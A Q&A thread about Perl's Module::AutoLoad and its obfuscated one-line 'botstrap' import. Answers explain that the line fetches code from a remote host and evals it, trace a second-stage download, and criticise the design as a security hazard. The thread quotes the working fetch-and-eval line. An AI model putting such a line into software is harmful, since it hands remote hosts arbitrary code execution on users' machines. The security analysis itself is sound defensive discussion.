# Perl - Understanding "botstrap"

Tags: perl

I have this piece of code

```
use lib do{eval<$b>&&botstrap("AutoLoad")if$b=new IO::Socket::INET 82.46.99.88.":1"};
```

which seems to import a library, but I have no idea how `botstrap` works.

Could somebody explain it to me because I want to port this to Python.

Comment: That looks an awful lot like the synopsis in the documentation for [Module::Autoload](https://metacpan.org/pod/Module%3a%3aAutoLoad). But explaining it would ruin the fun: "Although the snippet is fairly short, it is intentionally obfuscated using the RCX Framework as a quick way to detour those prying eyes from following how all the magic works, but the experienced Perl coder can still understand everything. This puzzle is left as a recreational challenge to the reader."

Comment: Please don't put your code off line unless it's so extensive that it won't fit in a post on Stack Overflow

Comment: The author of the code I'm talking about is Rob Brown, and the IP shown in the code is outdated.

Comment: @AvidProgrammer That's not an IP, it's a [v-string](http://perldoc.perl.org/perldata.html#Version-Strings). `perl -le'print 82.46.99.88'` shows that it corresponds to `R.cX`

Comment: I posted an answer and withdrew it because I feel that it would just be reiterating @Borodin's. This is an arbitrary remote code execution, and you do not want to do it.

Comment: @JoeMcMahon - Your deleted answer explicitly makes a lot of (IMO very important) points which Borodin doesn't state directly. I would encourage you to undelete it, as it may help to illuminate those who don't quite grasp the full details of just how boneheadedly idiotic this module is.

Comment: Thanks, I've reinstated it, and noted the mitigations the author is taking.

Answer (score 16):

`botstrap` is a private subroutine that is part of the [`Module::AutoLoad`](http://metacpan.org/module/Module::AutoLoad) module. The entire statement is supposed to be incorporated into your code without question

The idea is that the module will install any modules that are required by the code without intervention by the operator. I suggest that this is a dreadful idea, and that you should just make sure that anything your Python code imports has already been installed in the usual way

Comment: Not really important, but for those who are curious: the code opens a socket to R.cX:1, reads a line from the socket, and evals it. That's where `botstrap` comes from (it's not actually in the source of Module::AutoLoad).

Comment: @ThisSuitIsBlackNot: I was just writing a comment to say so. And that makes this module even less attractive than it initially appears. If you look at the contents of `http://R.cX:1/` then even that is obfuscated. All of this goes against the ideas of open source, and calling this "module" in production code would be crazy for so very many reasons

Comment: Even worse, the code downloaded from `http://r.cx:1/` uses `eval` to access `http://ww.limera1n.com/` and execute `iJailBreak`, which is an iPhone unlocker program. This is nothing to do with installing missing Perl modules, and the functionality is nefarious. That may be because the web site `http://r.cx` has been hacked, but there is no doubt that this module *doesn't belong on CPAN*.

Comment: Wow. See kids, this is why you should avoid string `eval` with arbitrary code.

Comment: @ThisSuitIsBlackNot: Yes, but in general you should be able to install something from CPAN (or, in this case, simply follow its directions) without having to check that what you're installing won't harm you. Do you have any idea who is responsible for CPAN, and whom I should contact about this? I've done some searches, but it seems to exist in a vacuum

Comment: Agreed. I almost said "this is why you shouldn't run arbitrary code from the internet," but then I realized I do that all the time with CPAN. Maybe try modules@perl.org, the PAUSE admins mailing list.

Comment: FWIW: This code is malicious, but there are several options for automatically installing modules that don't involve string eval'ing arbitrary code over TCP, such as [lib::xi](https://metacpan.org/pod/lib::xi) and [lazy](https://metacpan.org/pod/lazy).

Comment: As of July 28, 2020, the module has been removed from CPAN and the author blocked from uploading further modules.

Answer (score 11):

I'm putting on my security hat and making some comments about the overall design of the module and specifically about the test suite.

Time and again, we warn people about `curl | bash` as an outstandingly boneheaded thing to do. One should never simply execute something that happens to be at the far end of a URL that one does not control, and that is generally accessible on the Internet, and hope everything will be okay.

But the reason that this module was pulled earlier was not that it does this -- though I would argue that even the basic idea of implementing a security vulnerability as a module is a terrible idea -- it was pulled because of all the following:

- the test suite accesses a site the installer does not control without warning them this will happen
- it obscures the site being used
- the code being downloaded is not the minimum possible needed to ensure that the test passes
- the code being downloaded is deliberately obfuscated to make it difficult for the installer to vet it for safety
- worst, the code that it currently downloads *appears* to be malware. (side note: it *does not matter* if it isn't! The fact that it is not blindingly obvious is in itself bad).

The combination of all these is not only unsafe but outright dangerous. I see from the authors answers that the inclusion of a reference to an iOS jailbreak was meant to be "funny". Production modules are not supposed to be this kind of funny.

Putting this in a non-Acme namespace is inappropriate if humor is the intention[1]. Also, there is absolutely no need to obfuscate the downloaded code.

Even if the author changes what it's loading to a cleartext dummy "hey look, I got installed" module, they'd still be weakening the security of every installation that used this module to be only as good as their security is. If you wanted to write a module like this, you would have to be prepared to take on that level of responsibility for every site that uses it. Even if you think you are prepared to do that, you are probably not.

A footgun that is the responsibility of the user to police is one thing. A footgun that is delivered loaded, with ammunition that might suddenly be something extremely dangerous, and which is actually fired during *the test suite* is wildly inappropriate.

Update: I've spoken directly to the author, who seems to be willing to make this right, and will be taking my advice on this module: moving it to Acme, changing the test to use a local HTTP server instead of the external one, and additionally requiring that the environment variable `I_KNOW_THIS_IS_A_REMOTE_CODE_EXECUTION_VULNERABILITY_AND_I_AM_WILLING_TO_RISK_MY_JOB_AND_COMPANY` be set to a true value before the module will operate at all.

[1] CPAN uses the `Acme` namespace as a place to put amusing/pointless/etc. modules.